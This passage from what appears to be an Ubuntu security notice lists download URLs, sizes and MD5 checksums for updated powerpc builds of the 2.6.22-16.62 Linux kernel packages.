    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   773376 8ecc1b01084f05fc8a30dcba367fbb17
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   243374 f5d89f88e44805c6a7ff02d3d793b040
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   236492 b40b6d6255941b074c433ff80401dca0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   243348 7d13a5a91140623a78c1e08fbea355f9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    53752 454151a47fda8e3b3c668bec6866f44f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    47384 2ef012041f0aa58b92465f3fc45835b8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    53736 6c03185c6c370ede0f6358025c5ed74f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    69016 11ac0ea99394e3856a5381a7e64d4a4c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    62400 ed720d7ea5862cdd0303ee95b799a5db
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    68980 bd5fe39fc5ead27916dae780cbfe7254
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   166808 e619158315b74d4a89c26747de7d84e0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   147482 e1792fde7438b31ca48bb1a6d4103ec9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   166674 e19cec0bae4fd23b3fe016bee7013263
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   347904 f82afd2d8dc36441dfa07c6840e7f9d3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   385048 15a475430ef8496375a0f56dd534709f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   347808 40dd3225ce4a364713800d022ef1721e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  3205592 d51bcfcf1e70b4173be95e0105e958d3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  2183754 dc6bfade809aba129dba4df7e5828ed7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  3122696 a8cd6afd0498c8be2656f3f3eb1f1a02
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-cell_2.6.22-16.62_powerpc.deb
      Size/MD5:   659842 5b516afcb42b5c2f86c5c71b5725042e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-powerpc-smp_2.6.22-16.62_powerpc.deb
      Size/MD5:   571794 703844d1543871feead469d4cb5b4c3a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-powerpc64-smp_2.6.22-16.62_powerpc.deb
      Size/MD5:   575984 72187f38c78a058f68bf9c38bcdf010e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-powerpc_2.6.22-16.62_powerpc.deb
      Size/MD5:   571634 d4bc3fba6f122706d5359e5d7b234e1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-cell_2.6.22-16.62_powerpc.deb
      Size/MD5: 19768192 6c5bf2813be722eaa1045747b3ffba3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-powerpc-smp_2.6.22-16.62_powerpc.deb
      Size/MD5: 18718048 c25d9d28d154b48a2896e4437366fe50
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-powerpc64-smp_2.6.22-16.62_powerpc.deb
      Size/MD5: 19747328 119a7c10c5101ad136c552dd222662a9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-powerpc_2.6.22-16.62_powerpc.deb
      Size/MD5: 18492084 5a674a35a910fa3228f8eb08a451b327
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-16.62_powerpc.deb
      Size/MD5:   631436 c0f6e63af806b9ecbc66e9fef8ad7c42
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   298644 48bff09aa58589329762e46d0eefff8b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   256454 026543ed167df38b20f05fb57a922c41
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   298532 6275da882f119e1e62a0936b51a559b3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   173308 54b4874ab61cb636b7248d364972da83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   159608 c024b3ef21e6c3256c4181ec3ffd90d5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   173244 afaeaf9a81ee27fae58712eec319efb5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   288574 637c7f4e8218e15177363d901128602c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   256406 77d24572e55d9c347ff9df93f601a83b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   288534 5131f51e16ce94d6669fb351dd801f9f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1931630 9729256dad38b8a29e245879fafde870
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1654694 82f6b346822e471db0d4f1d07edc8510
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1909658 bd7dd1108c7ea9abf25f21db4b18f1d5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   216048 3f845c1d7f5cf9f244b8a8f02290c7b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   234436 f04e1b5f98e4f531510830a011c24b26
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   224070 4181d1eb6bf354232a8109a4e31b5073
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   181638 2448c27c94537c6d084f784959f0c3e4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   153870 2441b86833b3b895938f5e6019a16303
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   181574 ed75833e08734f0c9050243b5b2e7900
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   103614 d45cdf745035d8be9a9247fb011029d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    86748 fd5d758333123e69901c0d525d9f4379
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   103492 4168504d37a5e9eb5e6ce9328c9e541a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    46964 1c5bf47bfb57142ce0cb50770ea699da
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    45406 ed225368bdc3496dd165e8c7fba4aa3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    46984 9e2af203aaa9c364c124b768256f16d7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    54458 2e5748b63f540a6551a973185de7a4ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    41548 4d6330c581f32aed3bf2334bf06bc8c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    47788 9e970a32de76e65e8bf45c047f54f0bb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    87002 cdf3fde0feb19df8c52257e97f5c4093
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    74044 f640fb6d140f2e554084fd660203a3da
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    86976 4605aa609c3dcb7e32aa766040f2c428
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    30302 2569ac54fa32c933f7379e3b1e2ce3a2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    76248 a03f416092ad6893394ae00deb4ead0c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    30324 9faa32702a1ec303dc7c01c72c426275
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:     9946 22a9867b318a7488024e1843a9d2590d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:     8460 31b8284312b1b9384f7deee5302984b4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:     9946 e3489d92f06cb798477d7f0cf2654439
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    68512 2d93813080492451a0ca28c26385a703
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    56884 b7c9c67cf1bcda4705764c2dcb4b25cb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    68486 5eadf24b3a8e4ee8dd7ff414b17ba531
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   131434 2ef03e495597d3038707095f4608fe5f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    87772 d174c95880301564cd522c9a95fc3197
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   131266 de5debc41b327d5b4b30cdd89bb654f9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1432086 dea6e1415b07b3a9bbc2d75737764d38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1441336 1f4ca0cc90d2901becc442b9d11cc0f2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:  1432016 68fe3eb72d25acc7eb8a2c3ae0117f2a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    70934 53b93639e11c08ecd3dc9290290e7f33
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    75494 5b99408bd077d8c3c928edc0fccb5daf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    84754 ea6e593abc82f686f6d9c4a121ae1830
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    14526 d58aaa6c049fce5b272f6b1aba2357d9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    12530 9bae005e363f10e95623818eaccc32d3